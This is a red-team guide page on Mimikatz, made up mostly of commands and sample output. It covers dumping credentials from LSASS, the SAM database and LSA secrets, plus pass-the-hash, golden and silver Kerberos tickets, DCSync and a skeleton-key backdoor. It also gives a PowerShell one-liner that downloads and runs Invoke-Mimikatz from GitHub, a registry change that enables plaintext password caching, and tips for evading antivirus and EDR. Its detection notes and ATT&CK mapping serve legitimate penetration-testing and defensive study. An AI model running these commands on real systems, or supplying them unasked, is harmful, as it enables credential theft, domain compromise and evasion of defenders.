Mimikatz
Comprehensive guide to Mimikatz for credential extraction, pass-the-hash, Kerberos attacks, and Windows post-exploitation techniques.
Dec 23, 2025
Updated Dec 11, 2025
2 min read
MimikatzCredential DumpingPass-the-HashKerberosGolden TicketWindows SecurityPost-ExploitationActive DirectoryRed Team
Introduction
Mimikatz is a powerful post-exploitation tool for extracting credentials from Windows memory. Created by Benjamin Delpy, it has become essential for penetration testers and red teamers working in Windows environments. Mimikatz can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.
Detection Warning
Mimikatz is heavily signatured by antivirus and EDR solutions. In modern engagements, consider alternatives like:
- Invoke-Mimikatz - PowerShell version
- SafetyKatz - .NET implementation
- SharpKatz - C# port
- pypykatz - Python implementation (works on LSASS dumps offline)
Getting Started
Prerequisites
Most Mimikatz operations require elevated privileges:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name : NT AUTHORITY\SYSTEMModule Overview
| Module | Description |
|---|---|
sekurlsa | Extract passwords, keys, tickets from LSASS |
kerberos | Kerberos ticket manipulation |
lsadump | LSA secrets, SAM, cached credentials |
vault | Windows Vault passwords |
crypto | Certificate and key operations |
token | Token manipulation |
process | Process manipulation and injection |
Credential Extraction
Dump Logon Passwords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007df34)
Session : Interactive from 1
User Name : Administrator
Domain : CORP
Logon Server : DC01
msv :
[00000003] Primary
* Username : Administrator
* Domain : CORP
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
wdigest :
* Username : Administrator
* Domain : CORP
* Password : P@ssw0rd123!Dump SAM Database
mimikatz # lsadump::sam
RID : 000001f4 (500)
User : Administrator
Hash NTLM: cc36cf7a8514893efccd332446158b1a
RID : 000001f5 (501)
User : GuestDump LSA Secrets
mimikatz # lsadump::secrets
Secret : DefaultPassword
cur/text: ServiceAccountP@ss!Dump Cached Domain Credentials
mimikatz # lsadump::cache
User : CORP\jsmith
MsCacheV2 : $DCC2$10240#jsmith#a1b2c3d4e5f6...Extract from LSASS Dump
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswordsPass-the-Hash
Execute commands using NTLM hash without knowing the password:
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:cc36cf7a8514893efccd332446158b1a /run:cmd.exeWith AES Keys
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9Kerberos Attacks
Export Tickets
mimikatz # sekurlsa::tickets /export
# List current tickets
mimikatz # kerberos::list
# Purge tickets
mimikatz # kerberos::purgePass-the-Ticket
mimikatz # kerberos::ptt ticket.kirbi
# Verify
mimikatz # kerberos::listGolden Ticket
Create a forged TGT with the krbtgt hash:
# First, get krbtgt hash via DCSync
mimikatz # lsadump::dcsync /user:corp\krbtgt
# Create golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:cc36cf7a8514893efccd332446158b1a /id:500 /ptt
# Open command prompt with ticket
mimikatz # misc::cmdSilver Ticket
Create a forged service ticket:
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.corp.local /service:MSSQLSvc /rc4:cc36cf7a8514893efccd332446158b1a /pttDCSync Attack
Replicate credentials from Domain Controller:
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\krbtgt
mimikatz # lsadump::dcsync /all /csvRequirements:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set
Skeleton Key
Inject a master password into LSASS (works on any account):
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now authenticate to any account with password "mimikatz"
net use \\dc01\admin$ /user:Administrator mimikatzPowerShell (Invoke-Mimikatz)
PowerSploit Archived
PowerSploit is no longer actively maintained. Consider using SharpKatz, SafetyKatz, or pypykatz for maintained alternatives.
# Load Mimikatz in memory (PowerSploit - archived)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
# Dump credentials
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:CORP\Administrator"'
# Golden ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt"'
# Pass-the-hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe"'WDigest Credential Caching
Enable plaintext password storage (requires user to re-authenticate):
# Enable WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
# Requires lock/unlock or logoff/logon to take effectCommon One-Liners
# Full credential dump
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # vault::cred
mimikatz # vault::list
# Kerberos tickets
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::list /export
# Pass-the-hash
mimikatz # sekurlsa::pth /user:Admin /domain:CORP /ntlm:HASH /run:cmd
# DCSync all
mimikatz # lsadump::dcsync /domain:corp.local /all /csvDetection and Evasion
Common Detection Points
- LSASS memory access
- Suspicious process creation patterns
- Known Mimikatz signatures in memory
- DCSync replication traffic
- Kerberos ticket anomalies
Evasion Techniques
- Use obfuscated versions (Invoke-Mimikatz with AMSI bypass)
- Dump LSASS to disk and analyze offline with pypykatz
- Use direct syscalls to avoid API hooks
- Load from memory without touching disk
Related Resources
- Kerberoasting - Service ticket attacks
- Pass-the-Hash - NTLM relay and reuse
- BloodHound - Attack path discovery
- Impacket - Python-based alternatives
References
MITRE ATT&CK Techniques
- T1003.001 - OS Credential Dumping: LSASS Memory - sekurlsa::logonpasswords
- T1003.002 - OS Credential Dumping: Security Account Manager - lsadump::sam
- T1003.003 - OS Credential Dumping: NTDS - lsadump::dcsync
- T1003.004 - OS Credential Dumping: LSA Secrets - lsadump::secrets
- T1003.005 - OS Credential Dumping: Cached Domain Credentials - lsadump::cache
- T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket - kerberos::golden
- T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket - Service ticket forgery
- T1550.002 - Use Alternate Authentication Material: Pass the Hash - sekurlsa::pth
- T1550.003 - Use Alternate Authentication Material: Pass the Ticket - kerberos::ptt
- T1556.001 - Modify Authentication Process: Domain Controller Authentication - misc::skeleton
Official Documentation
- Mimikatz GitHub - Official repository
- Mimikatz Wiki - Command documentation
Security Resources
- ADSecurity Mimikatz Guide - Comprehensive usage guide
- HackTricks: Mimikatz - Attack techniques
Alternative Tools
- pypykatz - Python implementation for offline analysis
- SharpKatz - C# port
- SafetyKatz - .NET version with reflective loading
Last updated on
Ligolo-ng
Comprehensive guide to Ligolo-ng, a modern tunneling and pivoting tool for red team operations, featuring TUN interface support, multi-platform agents, and secure TLS communications.
NetExec (nxc)
NetExec guide covering SMB, LDAP, WinRM protocols for network enumeration, credential validation, lateral movement, and Active Directory attacks.